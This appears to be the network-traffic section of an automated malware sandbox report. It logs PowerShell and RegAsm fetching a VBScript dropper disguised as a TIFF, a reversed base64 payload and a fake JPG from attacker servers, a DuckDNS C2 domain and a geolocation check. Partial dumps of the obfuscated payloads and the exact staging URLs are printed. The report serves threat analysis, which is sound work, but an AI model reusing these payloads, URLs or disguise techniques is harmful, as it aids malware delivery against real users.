                                                              Oct 14, 2024 11:36:29.062748909 CEST192.168.2.51.1.1.10x9180Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Oct 14, 2024 11:36:07.406614065 CEST1.1.1.1192.168.2.50x53dcNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                              Oct 14, 2024 11:36:07.406614065 CEST1.1.1.1192.168.2.50x53dcNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                              Oct 14, 2024 11:36:07.406614065 CEST1.1.1.1192.168.2.50x53dcNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                              Oct 14, 2024 11:36:07.406614065 CEST1.1.1.1192.168.2.50x53dcNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                              Oct 14, 2024 11:36:15.334422112 CEST1.1.1.1192.168.2.50xd9c8No error (0)idabo.duckdns.org135.148.195.248A (IP address)IN (0x0001)false
                                                              Oct 14, 2024 11:36:16.279804945 CEST1.1.1.1192.168.2.50xbedaNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                              Oct 14, 2024 11:36:29.073044062 CEST1.1.1.1192.168.2.50x9180No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • raw.githubusercontent.com
                                                              • 192.3.220.40
                                                              • geoplugin.net

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549706192.3.220.40803812C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 14, 2024 11:36:01.371876001 CEST312OUTGET /450/seethebestpricewithgoodcookiesme.tIF HTTP/1.1
                                                              Accept: */*
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                              Host: 192.3.220.40
                                                              Connection: Keep-Alive
                                                              Oct 14, 2024 11:36:01.847358942 CEST1236INHTTP/1.1 200 OK
                                                              Date: Mon, 14 Oct 2024 09:36:01 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                              Last-Modified: Mon, 14 Oct 2024 05:12:43 GMT
                                                              ETag: "2fcf0-62468e2fb0efb"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 195824
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: image/tiff
                                                              Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 61 00 6c 00 6d 00 65 00 63 00 65 00 67 00 75 00 65 00 69 00 72 00 61 00 28 00 66 00 6c 00 75 00 63 00 74 00 75 00 61 00 64 00 6f 00 72 00 2c 00 20 00 64 00 65 00 73 00 76 00 61 00 72 00 69 00 61 00 72 00 2c 00 20 00 6d 00 69 00 6c 00 69 00 63 00 69 00 61 00 6e 00 6f 00 2c 00 20 00 6d 00 6f 00 61 00 6e 00 73 00 61 00 2c 00 20 00 68 00 65 00 6d 00 69 00 61 00 74 00 72 00 6f 00 70 00 68 00 69 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 69 00 61 00 6c 00 65 00 63 00 74 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 72 00 65 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 66 00 6f 00 72 00 6d 00 61 00 74 00 74 00 65 00 64 00 54 00 65 00 78 00 74 00 0d 00 0a 00 20 00 [TRUNCATED]
                                                              Data Ascii: private function almecegueira(fluctuador, desvariar, miliciano, moansa, hemiatrophia) dim filter dim dialect dim e dim res dim formattedText dim flags flags = 0 if miliciano.ArgumentExists(NPARA_FILTER) then filter = miliciano.Argument(NPARA_FILTER) dialect = URI_WQL_DIALECT end if if miliciano.ArgumentExists(NPARA_DIALECT) then dialect = miliciano.Argument(NPAR
                                                              Oct 14, 2024 11:36:01.847428083 CEST1236INData Raw: 00 41 00 5f 00 44 00 49 00 41 00 4c 00 45 00 43 00 54 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 49 00 66 00 20 00 4c 00 43 00 61 00 73
                                                              Data Ascii: A_DIALECT) end if If LCase(dialect) = "selector" Then dialect = "http://schemas.dmtf.org/wbem/ws
                                                              Oct 14, 2024 11:36:01.847465038 CEST448INData Raw: 00 20 00 66 00 69 00 6c 00 74 00 65 00 72 00 20 00 26 00 20 00 22 00 3c 00 77 00 73 00 6d 00 61 00 6e 00 3a 00 53 00 65 00 6c 00 65 00 63 00 74 00 6f 00 72 00 20 00 4e 00 61 00 6d 00 65 00 3d 00 27 00 22 00 20 00 26 00 20 00 45 00 73 00 63 00 61
                                                              Data Ascii: filter & "<wsman:Selector Name='" & Escape(name) & "'>" & Escape(value) & "</wsman:Selector>" Next fil
                                                              Oct 14, 2024 11:36:01.847503901 CEST1236INData Raw: 00 3d 00 20 00 22 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 73 00 63 00 68 00 65 00 6d 00 61 00 73 00 2e 00 6d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 63 00 6f 00 6d 00 2f 00 77 00 62 00 65 00 6d 00 2f 00 77 00 73 00 6d 00 61
                                                              Data Ascii: = "http://schemas.microsoft.com/wbem/wsman/1/WQL" End If If LCase(dialect) = "association" Then dial
                                                              Oct 14, 2024 11:36:01.847537041 CEST1236INData Raw: 00 74 00 61 00 6e 00 63 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 45 00 6c 00 73 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 66 00 6c 00 61 00 67 00 73 00 20 00 3d 00 20
                                                              Data Ascii: tance Else flags = flags OR fluctuador.EnumerationFlagAssociatedInstance End if End I
                                                              Oct 14, 2024 11:36:01.847577095 CEST1236INData Raw: 00 20 00 20 00 20 00 66 00 6c 00 61 00 67 00 73 00 20 00 3d 00 20 00 66 00 6c 00 61 00 67 00 73 00 20 00 4f 00 52 00 20 00 66 00 6c 00 75 00 63 00 74 00 75 00 61 00 64 00 6f 00 72 00 2e 00 45 00 6e 00 75 00 6d 00 65 00 72 00 61 00 74 00 69 00 6f
                                                              Data Ascii: flags = flags OR fluctuador.EnumerationFlagReturnEPR case VAL_RT_OBJ_EPR flags = flags O
                                                              Oct 14, 2024 11:36:01.847609997 CEST1236INData Raw: 00 79 00 44 00 65 00 65 00 70 00 42 00 61 00 73 00 65 00 50 00 72 00 6f 00 70 00 73 00 4f 00 6e 00 6c 00 79 00 0d 00 0a 00 20 00 20 00 20 00 20 00 65 00 6c 00 73 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 66 00 6c 00 61
                                                              Data Ascii: yDeepBasePropsOnly else flags = flags OR fluctuador.EnumerationFlagHierarchyDeep end if on erro
                                                              Oct 14, 2024 11:36:01.847644091 CEST1236INData Raw: 00 20 00 20 00 20 00 20 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 28 00 4c 00 43 00 61 00 73 00 65 00 28 00 68 00 65 00 6d 00 69 00 61 00 74 00 72 00 6f 00 70 00 68 00 69 00 61 00 29 00 20
                                                              Data Ascii: end if if(LCase(hemiatrophia) <> VAL_FORMAT_TEXT) then wscript.echo "<wsman:Results xmlns:wsman=""htt
                                                              Oct 14, 2024 11:36:01.847861052 CEST1236INData Raw: 00 74 00 72 00 6f 00 70 00 68 00 69 00 61 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 6f 00 6e 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 67 00 6f 00 74 00 6f 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                              Data Ascii: trophia on error goto 0 'reformat if requested on error resume next err.cle
                                                              Oct 14, 2024 11:36:01.847893953 CEST1236INData Raw: 00 4c 00 68 00 57 00 4c 00 65 00 62 00 63 00 57 00 43 00 57 00 5a 00 72 00 41 00 6c 00 4b 00 20 00 3d 00 20 00 22 00 5a 00 57 00 5a 00 57 00 4c 00 74 00 4c 00 66 00 4c 00 63 00 4c 00 57 00 4b 00 47 00 64 00 22 00 0d 00 0a 00 69 00 63 00 74 00 41
                                                              Data Ascii: LhWLebcWCWZrAlK = "ZWZWLtLfLcLWKGd"ictAcCLOuQvxZLk = "eZilPPUWNzLcnUu"KmRoKkxacpBisxL = "UUzJPAzLLmTZlaz"czHbmhbOfC
                                                              Oct 14, 2024 11:36:01.852493048 CEST1236INData Raw: 00 4c 00 6c 00 62 00 69 00 4f 00 6d 00 7a 00 63 00 63 00 64 00 57 00 74 00 22 00 0d 00 0a 00 43 00 63 00 41 00 53 00 69 00 64 00 68 00 5a 00 43 00 7a 00 4c 00 52 00 68 00 4c 00 52 00 20 00 3d 00 20 00 22 00 6b 00 57 00 6f 00 6b 00 57 00 6f 00 63
                                                              Data Ascii: LlbiOmzccdWt"CcASidhZCzLRhLR = "kWokWocbBpLWLAR"GeUGzZcaWPkOmoS = "ejUkaogKaLLieNK"LWnWLntabCpbJAO = "GijmckKoRhxuL


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.549708192.3.220.40804720C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 14, 2024 11:36:13.301935911 CEST76OUTGET /450/RRFCCE.txt HTTP/1.1
                                                              Host: 192.3.220.40
                                                              Connection: Keep-Alive
                                                              Oct 14, 2024 11:36:13.818883896 CEST1236INHTTP/1.1 200 OK
                                                              Date: Mon, 14 Oct 2024 09:36:13 GMT
                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                              Last-Modified: Mon, 14 Oct 2024 05:09:54 GMT
                                                              ETag: "a1000-62468d8e12667"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 659456
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/plain
                                                              Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                              Oct 14, 2024 11:36:13.818939924 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                              Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                              Oct 14, 2024 11:36:13.818973064 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                              Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                              Oct 14, 2024 11:36:13.819005966 CEST672INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                              Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                              Oct 14, 2024 11:36:13.819039106 CEST1236INData Raw: 67 78 4d 51 4d 44 43 7a 41 67 4d 34 4c 44 38 79 67 75 4d 67 4c 44 32 79 41 74 4d 49 4c 44 77 79 67 72 4d 77 4b 44 71 79 41 71 4d 59 4b 44 6b 79 67 6f 4d 41 4b 44 65 79 41 6e 4d 6f 4a 44 59 79 67 6c 4d 51 4a 44 53 79 41 6b 4d 34 49 44 4d 79 67 69
                                                              Data Ascii: gxMQMDCzAgM4LD8yguMgLD2yAtMILDwygrMwKDqyAqMYKDkygoMAKDeyAnMoJDYyglMQJDSyAkM4IDMygiMgIDGyAhMIIDAxgfMwHD6xAeMYHD0xgcMAHDuxAbMoGDoxgZMQGDixAYM4FDcxgWMgFDWxAVMIFDQxgTMwEDKxASMYEDExgQMAAD+wAPMoDD4wgNMQDDywAMM4CDswgKMgCDmwAJMICDgwgHMwBDawAGMYBDUwgEM
                                                              Oct 14, 2024 11:36:13.819072008 CEST1236INData Raw: 39 44 50 2f 51 7a 50 73 38 44 4a 2f 77 78 50 55 38 44 44 2f 51 67 50 38 37 44 39 2b 77 75 50 6b 37 44 33 2b 51 74 50 4d 37 44 78 2b 77 72 50 30 36 44 72 2b 51 71 50 63 36 44 6c 2b 77 6f 50 45 36 44 66 2b 51 6e 50 73 35 44 5a 33 77 38 4e 49 66 44
                                                              Data Ascii: 9DP/QzPs8DJ/wxPU8DD/QgP87D9+wuPk7D3+QtPM7Dx+wrP06Dr+QqPc6Dl+woPE6Df+QnPs5DZ3w8NIfDx3A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDi3Q4NAeDf3g3N0dDc3w2NodDZ3A2NcdDW3Q1NQdDT3g0NEdDQ3wzN4cDN3AzNscDK3QyNIcDB3AgNsbD62QuNgbD32gtNUbD02QkNAZDP2giNkYDI2whNYYDF2AhNMYDA
                                                              Oct 14, 2024 11:36:13.819120884 CEST1236INData Raw: 34 35 4e 4b 64 44 51 32 59 76 4e 75 62 54 6d 31 45 66 4e 73 57 54 6c 31 41 59 4e 58 56 54 45 30 73 39 4d 70 50 7a 6e 79 6f 61 4d 71 48 54 6d 78 38 55 4d 45 41 7a 2b 77 38 49 4d 47 43 54 43 77 41 41 41 41 41 41 55 41 55 41 49 41 38 54 66 2f 4d 6a
                                                              Data Ascii: 45NKdDQ2YvNubTm1EfNsWTl1AYNXVTE0s9MpPznyoaMqHTmx8UMEAz+w8IMGCTCwAAAAAAUAUAIA8Tf/MjP80Dz9cJPnyDl8wwOWvjA4gxN+eTT2YmNFVTz1waNWWTX0cPNITjn0UzMdNDEyYpMEGz+xULMyBAAAQEAFABA8ULPtyTp80JPWqT06UpODqTc68lONlDm28qNwZjX2wkN6YDK2YhNEUj81AeNOXDv1oaNYWDV1AEN
                                                              Oct 14, 2024 11:36:13.819154978 CEST1236INData Raw: 4d 7a 37 7a 6b 32 4d 59 4e 7a 51 7a 41 68 4d 75 4b 7a 70 78 77 64 4d 56 44 41 41 41 41 49 41 45 41 4c 41 41 41 67 50 6c 32 7a 71 39 55 43 50 52 76 6a 37 37 67 2b 4f 57 76 6a 6d 37 38 6f 4f 37 72 44 72 36 6f 6e 4f 4b 68 7a 53 34 30 43 4f 6d 67 6a
                                                              Data Ascii: Mz7zk2MYNzQzAhMuKzpxwdMVDAAAAIAEALAAAgPl2zq9UCPRvj77g+OWvjm78oO7rDr6onOKhzS40COmgjD4cwN4fD63E+NiSz1AAAA4AABgCwPt+Tk+QnP+0zk9MYPp0jB8ANP+yzh8wEPxwTA7g8OTtTR7A0OzsTH7cwOAoz358+NzfzI3QgNibDd2IlNCZTL2MSNCWTb1QWNXVDT0YPNuTTy0EMNTSDj0sHNxRzZ0AGNRRzS
                                                              Oct 14, 2024 11:36:13.819186926 CEST1236INData Raw: 63 6a 4d 75 49 54 48 78 67 66 4d 67 48 44 32 78 77 63 4d 36 47 54 6f 78 6b 5a 4d 53 47 44 68 78 63 58 4d 79 46 54 5a 78 41 57 4d 58 46 54 53 78 4d 55 4d 34 45 6a 4d 78 63 53 4d 66 45 44 46 78 34 41 4d 39 44 44 2b 77 6b 4f 4d 32 43 7a 6f 77 30 49
                                                              Data Ascii: cjMuITHxgfMgHD2xwcM6GToxkZMSGDhxcXMyFTZxAWMXFTSxMUM4EjMxcSMfEDFx4AM9DD+wkOM2Czow0IMBCDdw8GM5AzJAAAAkCABABAAA8z4/U2PO5Du+4mPW5zB9wfPj2jg8sNPKyjd8sGPgxzW8EFPMxjM8cxOqvj07o5O0tzV7EiO3rD24oLO1izh4YGOhhjL4cCOIcj/3g/NZfzz1sdNQXzl14YNjUTH1cRNNQTu0UKN
                                                              Oct 14, 2024 11:36:13.819221973 CEST1236INData Raw: 39 6a 52 2f 34 7a 50 4f 38 54 43 2f 51 67 50 34 37 54 30 2b 77 73 50 48 37 7a 75 2b 63 70 50 53 36 54 6a 2b 45 6f 50 64 35 44 57 2b 4d 6c 50 4b 35 7a 49 2b 34 68 50 5a 34 54 43 39 63 65 50 5a 33 54 7a 39 34 62 50 69 32 44 65 39 41 58 50 5a 31 54
                                                              Data Ascii: 9jR/4zPO8TC/QgP47T0+wsPH7zu+cpPS6Tj+EoPd5DW+MlPK5zI+4hPZ4TC9cePZ3Tz94bPi2De9AXPZ1TS90QPBoTn5IWO0kjL5IyNmfj4349Nafj13I9NOfjy3Y8NCfjv3o7N2ejs346Nqejp3I6Neejm3Y5NSejj3o4NGejg343N6djd3I3NudjaAAAAgCwAACAAAUjYAAAAMAwAwBwPQ/DW/UEPsyDq8QKPgyzm8YFPAsD/
                                                              Oct 14, 2024 11:36:13.824280977 CEST1236INData Raw: 73 46 50 44 78 7a 4c 38 63 79 4f 66 76 54 32 37 45 38 4f 62 75 6a 69 37 41 34 4f 68 70 6a 74 36 55 51 4f 58 6d 6a 69 35 55 59 4f 6b 6c 7a 58 35 6f 56 4f 4a 6c 7a 47 34 73 4c 4f 53 69 7a 51 33 73 2b 4e 53 66 6a 79 33 4d 36 4e 57 65 44 4f 33 34 79
                                                              Data Ascii: sFPDxzL8cyOfvT27E8Obuji7A4Ohpjt6UQOXmji5UYOklzX5oVOJlzG4sLOSizQ3s+NSfjy3M6NWeDO34yNccjF38gN6bD12MsNzazp2QpNBajM2YQNoWTl1kUNDVjI10RNTUDC04PN0Tj70gONiTD30oMNATDu00KNnSTo0oINCSTR00DNvQTJ0YBNLQjB0AwMnPj3zk9MKPjvzs6MjOzjzY4MBODezM3MsNTXzc1MKJDdyomM


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.549723178.237.33.50803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              TimestampBytes transferredDirectionData
                                                              Oct 14, 2024 11:36:16.288378000 CEST71OUTGET /json.gp HTTP/1.1
                                                              Host: geoplugin.net
                                                              Cache-Control: no-cache
                                                              Oct 14, 2024 11:36:16.899744987 CEST1170INHTTP/1.1 200 OK
                                                              date: Mon, 14 Oct 2024 09:36:16 GMT
                                                              server: Apache
                                                              content-length: 962
                                                              content-type: application/json; charset=utf-8
                                                              cache-control: public, max-age=300
                                                              access-control-allow-origin: *
                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549707185.199.111.1334434720C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-14 09:36:07 UTC134OUTGET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              2024-10-14 09:36:08 UTC903INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 6331693
                                                              Cache-Control: max-age=300
                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                              Content-Type: application/octet-stream
                                                              ETag: "c7af5123730da5215a9032249afad007dd54a2bf216bbf720e484463b4eebacd"
                                                              Strict-Transport-Security: max-age=31536000
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: deny
                                                              X-XSS-Protection: 1; mode=block
                                                              X-GitHub-Request-Id: 0C07:2DA33E:146EACB:16903B7:670CD329
                                                              Accept-Ranges: bytes
                                                              Date: Mon, 14 Oct 2024 09:36:08 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-nyc-kteb1890033-NYC
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 0
                                                              X-Timer: S1728898568.972326,VS0,VE52
                                                              Vary: Authorization,Accept-Encoding,Origin
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              X-Fastly-Request-ID: eb93799c40d9be44a86680e9323846244d518dd8
                                                              Expires: Mon, 14 Oct 2024 09:41:08 GMT
                                                              Source-Age: 0
                                                              2024-10-14 09:36:08 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
